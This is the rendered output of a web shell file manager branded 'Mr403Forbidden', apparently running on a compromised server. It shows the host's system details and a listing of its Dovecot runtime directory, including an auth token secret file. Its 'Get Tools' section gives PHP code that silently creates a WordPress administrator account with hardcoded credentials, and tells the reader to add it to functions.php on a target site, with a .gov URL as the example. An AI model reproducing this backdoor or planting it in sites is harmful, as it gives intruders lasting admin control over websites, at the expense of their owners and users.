./Mr403Forbidden

:/run/dovecot/ [ drwxr-xr-x ]

System: Linux 94.45.167.72.host.secureserver.net 4.18.0-553.120.1.el8_10.x86_64 #1 SMP Mon Apr 20 18:04:27 EDT 2026 x86_64
Software: Apache
PHP Version: 7.4.33 PHP Os: Linux
Server IP: 104.21.39.121
Your IP: 216.73.216.87
User: godevadmin (1035) | Group: godevadmin (1013)
Safe Mode: OFF
MYSQL: OFF | PERL: OFF | PYTHON: OFF | WGET: OFF | CURL: ON | GCC: OFF | PKEXEC: OFF
Disable Function:
exec,passthru,shell_exec,system

Get Tools
function mr403forbiddenadmin(){
$login = 'mr403forbidden';
$passw = 'mr403forbidden#1337';
$email = '[email protected]';
if ( !username_exists( $login ) && !email_exists( $email ) ) {
$user_id = wp_create_user( $login, $passw, $email );
$user = new WP_User( $user_id );
$user->set_role( 'administrator' );
}
}
add_action('init','mr403forbiddenadmin');
Add the above code in the functions.php file on the target website.
example: https://site.gov/wp-content/themes/[theme name/functions.php
Name Type Last Edit Size Owner/Group Permission Action
..
empty dir 2026-06-10 20:37 - root/root drwxr-xr-x
login dir 2026-06-13 9:22 - root/dovenull drwxr-x---
srv.imap dir 2026-06-15 11:37 - root/root drwx------
srv.imap-hibernate dir 2026-06-10 20:37 - root/root drwx------
srv.imap-login dir 2026-06-13 9:22 - root/root drwx------
srv.indexer-worker dir 2026-06-10 20:37 - root/root drwx------
srv.managesieve dir 2026-06-10 20:37 - root/root drwx------
srv.managesieve-login dir 2026-06-13 9:22 - root/root drwx------
srv.pop3 dir 2026-06-10 20:37 - root/root drwx------
srv.pop3-login dir 2026-06-13 9:22 - root/root drwx------
token-login dir 2026-06-13 9:22 - root/dovenull drwxr-x---
auth-token-secret.dat file 2026-06-10 20:37 32 B root/root -rw-------
dovecot.conf file 2026-04-29 7:29 22.13 KB root/root -rw-r--r--
dovecot.conf.binary file 2026-06-13 9:22 1.35 MB root/root -rw-------
master.pid file 2026-06-10 20:37 5 B root/root -rw-------

© ./Mr403Forbidden